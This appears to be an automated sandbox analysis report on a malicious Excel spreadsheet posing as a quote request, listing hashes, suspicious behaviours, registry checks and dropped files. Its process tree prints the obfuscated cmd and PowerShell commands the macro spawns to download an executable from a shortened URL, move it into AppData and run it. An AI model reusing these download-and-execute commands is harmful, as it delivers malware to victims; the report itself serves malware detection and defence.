Analysis
-
max time kernel
136s -
max time network
133s -
platform
windows10_x64 -
resource
win10 -
submitted
28-10-2020 08:02
Static task
static1
Behavioral task
behavioral1
Sample
Quote Request October-2020.xls
Resource
win7
Behavioral task
behavioral2
Sample
Quote Request October-2020.xls
Resource
win10
General
-
Target
Quote Request October-2020.xls
-
Size
66KB
-
MD5
57d2e6d7a94b56acfc61035d2577a86a
-
SHA1
69248b27552383513f0b4d5839a63386849217dd
-
SHA256
166989f61fb157324d0c29d69d5aae0aa2a7813c9f4a0c1ab6506730dd66b434
-
SHA512
04b171a580f5d46d82ceb5d6a73009bc8e3a289e75e592e1b0d5b83052a1f37221e3c197bf170da07fbebf7088fa7dfb044103890f127d0af45d2aba01800e2e
Malware Config
Extracted
https://tinyurl.com/yxmkb9y9
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.execmd.execmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2124 3940 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2244 3940 cmd.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2368 3940 cmd.exe EXCEL.EXE -
Blacklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 18 2616 powershell.exe 22 2616 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
ye.exepid process 2000 ye.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3940 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2616 powershell.exe 2572 powershell.exe 3804 powershell.exe 2572 powershell.exe 3804 powershell.exe 2616 powershell.exe 2572 powershell.exe 3804 powershell.exe 2616 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 2616 powershell.exe Token: SeDebugPrivilege 3804 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE 3940 EXCEL.EXE -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
EXCEL.EXEcmd.execmd.execmd.exepowershell.exedescription pid process target process PID 3940 wrote to memory of 2124 3940 EXCEL.EXE cmd.exe PID 3940 wrote to memory of 2124 3940 EXCEL.EXE cmd.exe PID 3940 wrote to memory of 2244 3940 EXCEL.EXE cmd.exe PID 3940 wrote to memory of 2244 3940 EXCEL.EXE cmd.exe PID 3940 wrote to memory of 2368 3940 EXCEL.EXE cmd.exe PID 3940 wrote to memory of 2368 3940 EXCEL.EXE cmd.exe PID 2244 wrote to memory of 2572 2244 cmd.exe powershell.exe PID 2244 wrote to memory of 2572 2244 cmd.exe powershell.exe PID 2124 wrote to memory of 2616 2124 cmd.exe powershell.exe PID 2124 wrote to memory of 2616 2124 cmd.exe powershell.exe PID 2368 wrote to memory of 3804 2368 cmd.exe powershell.exe PID 2368 wrote to memory of 3804 2368 cmd.exe powershell.exe PID 3804 wrote to memory of 2000 3804 powershell.exe ye.exe PID 3804 wrote to memory of 2000 3804 powershell.exe ye.exe PID 3804 wrote to memory of 2000 3804 powershell.exe ye.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Quote Request October-2020.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /k p^ower^shell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxmkb9y9'),'ye.exe')2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'+'tps://tinyurl.com/yxmkb9y9'),'ye.exe')3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /k p^ower^shell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 20; Move-Item "ye.exe" -Destination "$env:appdata"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /k po^wer^shell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 stARt`-slE`Ep 25; cd $env:appdata; ./ye.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ye.exe"C:\Users\Admin\AppData\Roaming\ye.exe"4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
d737fc27bbf2f3bd19d1706af83dbe3f
SHA1212d219394124968b50769c371121a577d973985
SHA256b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
SHA512974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
e53466bf92bb5d6747f922f11aca0a9c
SHA19437465500d602b8abcf82eaeb51afcb1a36d18b
SHA25679ca04cadff6832a7dd2df04ab8f56676af8429b3dc324b2c2d1ef23d7d0081e
SHA512fdbed140374c758b28ef8d5824161bd916f05ae9a6499ef161351c1e1a1408c6da1a6c9472c1cb1ed37f2c5b874e671dc9bf5ef53bb2bef3cbffc96472337c7c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
fd8b143fc908b264d00f2c6b3e05ea0b
SHA11fd03106df56535d75d0f507831a3c4593fe00cc
SHA256432dda5ca8584a4864c51da2a290e859ebc9705062195acd2f70d278d34bb154
SHA512d039b32b0466295010cc9a124dc9fd42b48909c34ccd8372e7bbf8f059e0391618eabe059030ba3e3535377c7e4d319d1ded449965a3d69b719166e1a88b815b
-
C:\Users\Admin\AppData\Roaming\ye.exeMD5
9511fdd4fff8aa19872ac503e15a5b86
SHA18db2c03943393cfac44dd56e948852f2d132e2ce
SHA2562265d18a36231a2141dc86a9dd49ef5538ab7f0509cad1459e5d11ccaeb15020
SHA512c3526363a40c8a4c2009e16269c907196d376d63c5caa5b5b9825431958aa33bfa1d341cf162210da84233090ed0ec2f748eabdd4e4e14a1cdc76ccd8fa85426
-
C:\Users\Admin\Documents\ye.exeMD5
9511fdd4fff8aa19872ac503e15a5b86
SHA18db2c03943393cfac44dd56e948852f2d132e2ce
SHA2562265d18a36231a2141dc86a9dd49ef5538ab7f0509cad1459e5d11ccaeb15020
SHA512c3526363a40c8a4c2009e16269c907196d376d63c5caa5b5b9825431958aa33bfa1d341cf162210da84233090ed0ec2f748eabdd4e4e14a1cdc76ccd8fa85426
-
memory/2000-19-0x0000000000000000-mapping.dmp
-
memory/2124-1-0x0000000000000000-mapping.dmp
-
memory/2244-2-0x0000000000000000-mapping.dmp
-
memory/2368-3-0x0000000000000000-mapping.dmp
-
memory/2572-4-0x0000000000000000-mapping.dmp
-
memory/2572-13-0x0000026757740000-0x0000026757741000-memory.dmpFilesize
4KB
-
memory/2572-9-0x0000026757590000-0x0000026757591000-memory.dmpFilesize
4KB
-
memory/2572-7-0x00007FFACBF70000-0x00007FFACC95C000-memory.dmpFilesize
9.9MB
-
memory/2616-6-0x00007FFACBF70000-0x00007FFACC95C000-memory.dmpFilesize
9.9MB
-
memory/2616-5-0x0000000000000000-mapping.dmp
-
memory/3804-10-0x00007FFACBF70000-0x00007FFACC95C000-memory.dmpFilesize
9.9MB
-
memory/3804-8-0x0000000000000000-mapping.dmp
-
memory/3940-0-0x00007FFAD49C0000-0x00007FFAD4FF7000-memory.dmpFilesize
6.2MB